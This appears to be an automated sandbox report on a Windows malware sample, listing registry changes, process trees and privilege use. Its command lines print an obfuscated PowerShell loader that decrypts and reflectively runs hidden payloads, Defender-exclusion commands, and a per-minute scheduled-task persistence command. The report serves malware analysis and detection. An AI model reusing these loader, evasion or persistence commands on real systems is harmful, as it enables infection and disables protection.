Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

Modifies registry class 7 IoCs

Processes:

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exesvchost.exeHiplace.exeexplorer.exepowershell.exesvchost.exe48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings	Hiplace.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe

Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

3304 schtasks.exe
4940 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 4 IoCs

Processes:

Hiplace.exesvchost.exeexplorer.exesvchost.exe

pid process

2368 Hiplace.exe
5096 svchost.exe
1480 explorer.exe
5496 svchost.exe

pid	process
3304	schtasks.exe
4940	schtasks.exe

pid	process
2368	Hiplace.exe
5096	svchost.exe
1480	explorer.exe
5496	svchost.exe

Suspicious behavior: EnumeratesProcesses 47 IoCs

Processes:

powershell.exeHiplace.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exepowershell.exeexplorer.exepowershell.exepowershell.exesvchost.exepowershell.exepowershell.exe

pid	process
4440	powershell.exe
4440	powershell.exe
2368	Hiplace.exe
2368	Hiplace.exe
4308	powershell.exe
4308	powershell.exe
1440	powershell.exe
1440	powershell.exe
5088	powershell.exe
5088	powershell.exe
3572	powershell.exe
3572	powershell.exe
5084	powershell.exe
5084	powershell.exe
1312	powershell.exe
1312	powershell.exe
716	powershell.exe
716	powershell.exe
5096	svchost.exe
5096	svchost.exe
3572	powershell.exe
4968	powershell.exe
4968	powershell.exe
1480	explorer.exe
1480	explorer.exe
1204	powershell.exe
1204	powershell.exe
3668	powershell.exe
3668	powershell.exe
4308	powershell.exe
5088	powershell.exe
1440	powershell.exe
5084	powershell.exe
1312	powershell.exe
716	powershell.exe
4968	powershell.exe
3668	powershell.exe
1204	powershell.exe
5496	svchost.exe
5496	svchost.exe
5424	powershell.exe
5424	powershell.exe
5144	powershell.exe
5144	powershell.exe
5144	powershell.exe
5424	powershell.exe
5096	svchost.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

svchost.exeexplorer.exepowershell.exeHiplace.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exepowershell.exepowershell.exesvchost.exeexplorer.exesvchost.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	5096	svchost.exe
Token: SeDebugPrivilege	1480	explorer.exe
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeDebugPrivilege	2368	Hiplace.exe
Token: SeDebugPrivilege	2368	Hiplace.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	5084	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	716	powershell.exe
Token: SeDebugPrivilege	5096	svchost.exe
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	3668	powershell.exe
Token: SeDebugPrivilege	1204	powershell.exe
Token: SeDebugPrivilege	1480	explorer.exe
Token: SeDebugPrivilege	5496	svchost.exe
Token: SeDebugPrivilege	5496	svchost.exe
Token: SeDebugPrivilege	5424	powershell.exe
Token: SeDebugPrivilege	5144	powershell.exe
Token: SeDebugPrivilege	1972	svchost.exe
Token: SeDebugPrivilege	4824	explorer.exe
Token: SeDebugPrivilege	1496	svchost.exe
Token: SeDebugPrivilege	6064	explorer.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

Hiplace.exesvchost.exeexplorer.exesvchost.exe

pid process

2368 Hiplace.exe
5096 svchost.exe
1480 explorer.exe
5496 svchost.exe

pid	process
2368	Hiplace.exe
5096	svchost.exe
1480	explorer.exe
5496	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exesvchost.comsvchost.comsvchost.comsvchost.comcmd.exenet.exesvchost.exesvchost.comHiplace.exeexplorer.exesvchost.comsvchost.comsvchost.comsvchost.com

description	pid	process	target process
PID 1128 wrote to memory of 1848	1128	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
PID 1128 wrote to memory of 1848	1128	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
PID 1848 wrote to memory of 1600	1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	cmd.exe
PID 1848 wrote to memory of 1600	1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	cmd.exe
PID 1848 wrote to memory of 968	1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 1848 wrote to memory of 968	1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 1848 wrote to memory of 968	1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 1848 wrote to memory of 2932	1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 1848 wrote to memory of 2932	1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 1848 wrote to memory of 2932	1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 1848 wrote to memory of 4972	1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 1848 wrote to memory of 4972	1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 1848 wrote to memory of 4972	1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 968 wrote to memory of 2368	968	svchost.com	Hiplace.exe
PID 968 wrote to memory of 2368	968	svchost.com	Hiplace.exe
PID 2932 wrote to memory of 1480	2932	svchost.com	explorer.exe
PID 2932 wrote to memory of 1480	2932	svchost.com	explorer.exe
PID 1848 wrote to memory of 3396	1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 1848 wrote to memory of 3396	1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 1848 wrote to memory of 3396	1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe	svchost.com
PID 4972 wrote to memory of 5096	4972	svchost.com	svchost.exe
PID 4972 wrote to memory of 5096	4972	svchost.com	svchost.exe
PID 3396 wrote to memory of 2620	3396	svchost.com	PORSCH~1.EXE
PID 3396 wrote to memory of 2620	3396	svchost.com	PORSCH~1.EXE
PID 1600 wrote to memory of 2472	1600	cmd.exe	net.exe
PID 1600 wrote to memory of 2472	1600	cmd.exe	net.exe
PID 2472 wrote to memory of 3928	2472	net.exe	net1.exe
PID 2472 wrote to memory of 3928	2472	net.exe	net1.exe
PID 1600 wrote to memory of 4440	1600	cmd.exe	powershell.exe
PID 1600 wrote to memory of 4440	1600	cmd.exe	powershell.exe
PID 5096 wrote to memory of 504	5096	svchost.exe	svchost.com
PID 5096 wrote to memory of 504	5096	svchost.exe	svchost.com
PID 5096 wrote to memory of 504	5096	svchost.exe	svchost.com
PID 504 wrote to memory of 4308	504	svchost.com	powershell.exe
PID 504 wrote to memory of 4308	504	svchost.com	powershell.exe
PID 504 wrote to memory of 4308	504	svchost.com	powershell.exe
PID 2368 wrote to memory of 4832	2368	Hiplace.exe	svchost.com
PID 2368 wrote to memory of 4832	2368	Hiplace.exe	svchost.com
PID 2368 wrote to memory of 4832	2368	Hiplace.exe	svchost.com
PID 1480 wrote to memory of 5008	1480	explorer.exe	svchost.com
PID 1480 wrote to memory of 5008	1480	explorer.exe	svchost.com
PID 1480 wrote to memory of 5008	1480	explorer.exe	svchost.com
PID 4832 wrote to memory of 5088	4832	svchost.com	powershell.exe
PID 4832 wrote to memory of 5088	4832	svchost.com	powershell.exe
PID 4832 wrote to memory of 5088	4832	svchost.com	powershell.exe
PID 5008 wrote to memory of 1312	5008	svchost.com	powershell.exe
PID 5008 wrote to memory of 1312	5008	svchost.com	powershell.exe
PID 5008 wrote to memory of 1312	5008	svchost.com	powershell.exe
PID 5096 wrote to memory of 4856	5096	svchost.exe	svchost.com
PID 5096 wrote to memory of 4856	5096	svchost.exe	svchost.com
PID 5096 wrote to memory of 4856	5096	svchost.exe	svchost.com
PID 4856 wrote to memory of 5084	4856	svchost.com	powershell.exe
PID 4856 wrote to memory of 5084	4856	svchost.com	powershell.exe
PID 4856 wrote to memory of 5084	4856	svchost.com	powershell.exe
PID 2368 wrote to memory of 224	2368	Hiplace.exe	svchost.com
PID 2368 wrote to memory of 224	2368	Hiplace.exe	svchost.com
PID 2368 wrote to memory of 224	2368	Hiplace.exe	svchost.com
PID 224 wrote to memory of 3572	224	svchost.com	powershell.exe
PID 224 wrote to memory of 3572	224	svchost.com	powershell.exe
PID 224 wrote to memory of 3572	224	svchost.com	powershell.exe
PID 1480 wrote to memory of 4388	1480	explorer.exe	svchost.com
PID 1480 wrote to memory of 4388	1480	explorer.exe	svchost.com
PID 1480 wrote to memory of 4388	1480	explorer.exe	svchost.com
PID 5096 wrote to memory of 2164	5096	svchost.exe	svchost.com

C:\Users\Admin\AppData\Local\Temp\48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
"C:\Users\Admin\AppData\Local\Temp\48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe"
1⤵
- Checks computer location settings
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1128
- C:\Users\Admin\AppData\Local\Temp\3582-490\48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
  "C:\Users\Admin\AppData\Local\Temp\3582-490\48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Hiplace.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1600
  - - C:\Windows\system32\net.exe
      net file
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2472
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        5⤵
        
        PID:3928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nPhjODIsI/WDcZybH65++xlcc22S7b9QC/h68k58u3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3wWdbJRvdn4KnLQIMJo8WA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tQGgt=New-Object System.IO.MemoryStream(,$param_var); $txwZc=New-Object System.IO.MemoryStream; $npUIY=New-Object System.IO.Compression.GZipStream($tQGgt, [IO.Compression.CompressionMode]::Decompress); $npUIY.CopyTo($txwZc); $npUIY.Dispose(); $tQGgt.Dispose(); $txwZc.Dispose(); $txwZc.ToArray();}function execute_function($param_var,$param2_var){ $dEZgT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $exMEB=$dEZgT.EntryPoint; $exMEB.Invoke($null, $param2_var);}$zeopl = 'C:\Users\Admin\AppData\Roaming\Hiplace.bat';$host.UI.RawUI.WindowTitle = $zeopl;$DxdHS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($zeopl).Split([Environment]::NewLine);foreach ($kajrD in $DxdHS) { if ($kajrD.StartsWith(':: ')) { $eWkLV=$kajrD.Substring(3); break; }}$payloads_var=[string[]]$eWkLV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Command and Scripting Interpreter: PowerShell
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4440
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5448
      - C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost.exe
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5496
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5144
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5424
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Hiplace.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Users\Admin\AppData\Roaming\Hiplace.exe
      C:\Users\Admin\AppData\Roaming\Hiplace.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Modifies registry class
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2368
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Hiplace.exe'
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4832
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Hiplace.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5088
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Hiplace.exe'
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:224
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Hiplace.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3572
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\explorer.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2932
  - - C:\Users\Admin\AppData\Roaming\explorer.exe
      C:\Users\Admin\AppData\Roaming\explorer.exe
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Modifies registry class
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1480
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5008
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1312
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4388
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:716
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\explorer.exe'
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2508
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\explorer.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4968
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1676
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1204
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Local\Temp\explorer.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2404
      - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn explorer /tr C:\Users\Admin\AppData\Local\Temp\explorer.exe
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4940
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4972
  - - C:\Users\Admin\AppData\Roaming\svchost.exe
      C:\Users\Admin\AppData\Roaming\svchost.exe
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Modifies registry class
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:5096
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:504
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4308
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4856
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5084
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2164
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1440
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3748
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3668
    - - C:\Windows\svchost.com
        
